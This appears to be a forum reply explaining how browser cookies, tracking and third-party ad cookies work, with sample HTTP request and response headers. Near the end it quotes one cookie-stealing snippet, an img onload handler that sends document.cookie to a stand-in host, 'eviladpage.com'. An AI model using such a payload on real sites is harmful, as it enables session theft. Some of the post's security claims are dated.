Not true, BC_Programmer.
The browser only allows client side script to view cookies designated as being viewable by the URL as well as cookies designated as anonymous.
a Cookie is simply a small text file. all it contains is:
1. A name-value pair containing the actual data
2. An expiry date after which it is no longer valid
3. The domain and path of the server it should be sent to
note that traditionally number 3 is designated by the filename; Internet Explorer does this. Other browsers store it in a database or other format.
when you request a page and have cookies enabled, the cookie file/data <only for that site> is sent in the HTTP header, and therefore only the cookie data for that site is accessible from a server-side script.
Client side script can only access cookie data designated for it's domain. You cannot spy from one site on the cookies created by
www.Microsoft.com, for example. (unless there is a unintended browser vulnerability that makes this possible).
a Tracking cookie, for example, despite what many people have been led to believe, can only track users browser habits across a single domain. This is done by storing, server side, information about the IP address, and generating a random string for each IP address. The browser of course saves this cookie, and thereafter sends that cookie back to the server whenever it navigates across pages within that domain. The server can then use this cookie data and create a log of IP address, page viewed, and the randomly generated key which can later be analyzed to view users browsing habits. In particular it can even track when users change IP addresses, as the browser will send the same cookie containing the same randomly generated string that can be used to lookup previous addresses used by the same visitor.
adware and spyware cookies are third party cookies that are usually set and retrieved via the use of an image from their domain. This is facilitated by the owner of the domain and permitted by them in exchange for ad revenue. The images that are used for advertisements come from a seperate domain; when retrieving these objects the browser sends the same HTTP request header and as per usual sends the cookie information for the domain that the image resides on- the advertisement site, for example. The advertising site can then store information regarding the actual page being viewed, the IP address, and other tracking information.
A cookie is set by the server; the browser itself it responsible for storing the cookie. for example, a browser might send this request to load a page:
GET /forum/index.php HTTP/1.1
Host: www.computerhope.com
The server replies with a GET response, which can optionally include a request for the browser to store cookies:
HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: name=value
since HTTP GET is used to download images as well as other content, this is how "third party" cookies are stored. You might never visit any actual page on ad.doubleclick.net or whatever, but their images and other content are used on a variety of advertisement packages that other sites employ to get ad revenue. These images are downloaded from that server and can therefore request the storage of cookies as well as read cookies from your computer that relate to ad.doubleclick.net.
Therefore when requesting a page containing advertisements, the GET request sent from the browser will contain the cookie data stored for the domain that the image resides on. The server can do what it wants with this data. for advertising sites this probably get's stored in a database somewhere and is used for tracking user habits. Of course the cookie is hardly the <dangerous> part here, since the server could just as easily, and they often do, track movement throughout ad supported pages simply via IP Address.
Spyware can of course see anything on you're PC and cookies are no exception. If you have spyware cookies really shouldn't be a front row concern anyway; since the spyware can watch <everything> you do. it doesn't need to read your cookies to find out your password for certain sites; it can just watch you type them, something it can force you to do by deleting the cookies (which don't usually contain your password plaintext anyway)
But when it comes to actual websites, only the domain that created the cookie can read the cookie data. For example, google stores a cookie when you save your search preferences, such as language, safesearch, etc.
An interesting thing is, if you change your preferences for google.com, even google.ca or google.it cannot see them. to test, I visited
www.google.it and changed my preferences there to display 100 search results. I then saved them (of course) and went to
www.google.com (which redirects to google.ca). and did a search. I still only got 10 results per page. however, searching with google.it showed 100 results per page.
Cookie theft is probably the only thing that somebody can worry about; this is facilitated by a link or URL being used on one page being used to access another. If the URL is generated via javascript it can be made to include all the cookie data for the first party site. for example, a advertisement might have it's image created as such:
<img onload="this.src ='http://eviladpage.com/stole.php?text='+escape(document.cookie); return false;">
the server at "eviladpage" now has access to the cookies from the first party site where the image was (often by way of advertisements) by way of the PHP parameter "text" being sent. It can then store all that away in a database on the ad site as it pleases.
However, technically speaking, such use of indirection is not really the ad site reading the cookies from another domain; instead, the first domain is explicitly sending the cookie data it has (well, actually the browser is, but the first party site has the image reference) to the ad site; disabling javascript, or using an ad blocker stops this completely.
During the early days of cookie use there was a technique done called "cookie poisoning" wherein a attacker on one PC could hijack an active session of a user on another PC by sending a cookie that makes the server think it came from the victim. This is hardly relevant, though, since this has largely been eliminated by a quick comparision between two IP addresses as well as making such keys different each session.
Cookies, in general, are harmless compared to the other methods of client-side storage such as the new DOM Storage mechanism that will be used in HTML 5 as well as DHTML behaviours (which I think have been (thankfully) removed from IE).